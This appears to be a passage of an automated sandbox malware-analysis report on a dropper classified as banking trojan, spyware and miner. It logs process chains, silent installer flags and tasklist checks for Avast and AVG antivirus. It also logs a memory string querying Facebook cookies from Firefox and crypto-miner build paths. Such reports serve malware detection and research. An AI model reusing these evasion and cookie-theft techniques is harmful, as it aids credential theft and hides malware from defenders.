                Source: fwrhglUiBb.dll.13.drStatic PE information: No import functions for PE file found
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs l39HA25qjw.exe
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytProcess token adjusted: Load Driver
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytProcess token adjusted: Security
                Source: jame001[1].exe.20.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: EfRhfn.20.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: EfRhfn.exe.29.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jame001[1].exe.20.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: EfRhfn.20.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: EfRhfn.exe.29.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: jame001[1].exe.20.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                Source: EfRhfn.20.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                Source: EfRhfn.exe.29.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                Source: jame001[1].exe.20.drStatic PE information: Section: .rdata ZLIB complexity 0.991296875
                Source: jame001[1].exe.20.drStatic PE information: Section: .reloc ZLIB complexity 0.9995031524122807
                Source: EfRhfn.20.drStatic PE information: Section: .rdata ZLIB complexity 0.991296875
                Source: EfRhfn.20.drStatic PE information: Section: .reloc ZLIB complexity 0.9995031524122807
                Source: EfRhfn.exe.29.drStatic PE information: Section: .rdata ZLIB complexity 0.991296875
                Source: EfRhfn.exe.29.drStatic PE information: Section: .reloc ZLIB complexity 0.9995031524122807
                Source: l39HA25qjw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Adblock.lnk.22.drLNK file: ..\..\..\..\..\Users\user\Programs\Adblock\Adblock.exe
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LWJump to behavior
                Source: classification engineClassification label: mal100.phis.bank.troj.spyw.expl.evad.mine.winEXE@76/142@13/17
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00405933 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,1_2_00405933
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00404669 FindResourceA,SizeofResource,FindResourceA,LoadResource,LockResource,memcpy_s,FreeResource,1_2_00404669
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                Source: l39HA25qjw.exeVirustotal: Detection: 14%
                Source: l39HA25qjw.exeReversingLabs: Detection: 20%
                Source: C:\Users\user\Desktop\l39HA25qjw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\l39HA25qjw.exe C:\Users\user\Desktop\l39HA25qjw.exe
                Source: C:\Users\user\Desktop\l39HA25qjw.exeProcess created: C:\Windows\SysWOW64\at.exe at 3874982763784yhwgdfg78234789s42809374918uf
                Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\l39HA25qjw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Virtual.wms & ping -n 5 localhost
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq AvastUI.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "avastui.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq AVGUI.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "avgui.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^xAuYKKZEsy$" Similarly.wms
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif Fuck.exe.pif h
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 5
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQProcess created: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp "C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp" /SL5="$5040E,11860388,791040,C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ" -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 7960 -ip 7960
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7960 -s 272
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe "C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" /install /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exeProcess created: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe "C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" -burn.filehandle.attached=636 -burn.filehandle.self=644 /install /quiet /norestart
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2776 -ip 2776
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeProcess created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe "C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{F7864B24-BD58-4321-8DAF-90AD3F7AED80} {2D0A5E22-0BB0-4C91-8FDC-D5C3E4413F94} 8120
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspService
                Source: unknownProcess created: C:\Windows\System32\VSSVC.exe C:\Windows\system32\vssvc.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k swprv
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 856
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3452 -ip 3452
                Source: C:\Users\user\Desktop\l39HA25qjw.exeProcess created: C:\Windows\SysWOW64\at.exe at 3874982763784yhwgdfg78234789s42809374918ufJump to behavior
                Source: C:\Users\user\Desktop\l39HA25qjw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c cmd < Virtual.wms & ping -n 5 localhostJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq AvastUI.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "avastui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq AVGUI.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /N "avgui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^xAuYKKZEsy$" Similarly.wms Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif Fuck.exe.pif h Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQProcess created: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp "C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp" /SL5="$5040E,11860388,791040,C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ" -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe "C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" /install /quiet /norestart
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 7960 -ip 7960
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7960 -s 272
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2776 -ip 2776
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 856
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3452 -ip 3452
                Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exeProcess created: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe "C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" -burn.filehandle.attached=636 -burn.filehandle.self=644 /install /quiet /norestart
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeProcess created: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe "C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{F7864B24-BD58-4321-8DAF-90AD3F7AED80} {2D0A5E22-0BB0-4C91-8FDC-D5C3E4413F94} 8120
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspService
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00401F9B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00401F9B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EC1749 AdjustTokenPrivileges,CloseHandle,13_2_00EC1749
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EC1D4D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,13_2_00EC1D4D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EC1749 AdjustTokenPrivileges,CloseHandle,19_2_00EC1749
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EC1D4D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00EC1D4D
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq AvastUI.exe"
                Source: C:\Users\user\Desktop\l39HA25qjw.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED606E CoInitialize,CoCreateInstance,CoUninitialize,13_2_00ED606E
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00405933 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,1_2_00405933
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT host,name,value,expiry FROM moz_cookies where host='.facebook.com';
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: Fuck.exe.pif, 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E7FEF0 CreateToolhelp32Snapshot,13_2_00E7FEF0
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6728:64:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7960
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnMutant created: \Sessions\1\BaseNamedObjects\37238328-1324242-5456786-8fdff0-67547552436675
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:304:WilStaging_02
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:2692:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3972:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpMutant created: \Sessions\1\BaseNamedObjects\AdblockInstallMutex
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:304:WilStaging_02
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3972:304:WilStaging_02
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytMutant created: \Sessions\1\BaseNamedObjects\patatoes
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2776
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCommand line argument: Kernel32.dll1_2_00402BF2
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCommand line argument: pp@1_2_00406FC0
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpWindow found: window name: TMainForm
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeWindow detected: Number of UI elements: 23
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1Jump to behavior
                Source: l39HA25qjw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: l39HA25qjw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: l39HA25qjw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: l39HA25qjw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: l39HA25qjw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: l39HA25qjw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: l39HA25qjw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: l39HA25qjw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\vladimir\projects\massivesdk\cmake-build-vs16-x64-embedded\bin\RelWithDebInfo\xmrBridge.pdb// source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wextract.pdb source: l39HA25qjw.exe, l39HA25qjw.exe, 00000001.00000000.42202825202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Fuck.exe.pif, 00000014.00000003.42873695221.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLL\XMRCLBridge.pdbee!GCTL source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
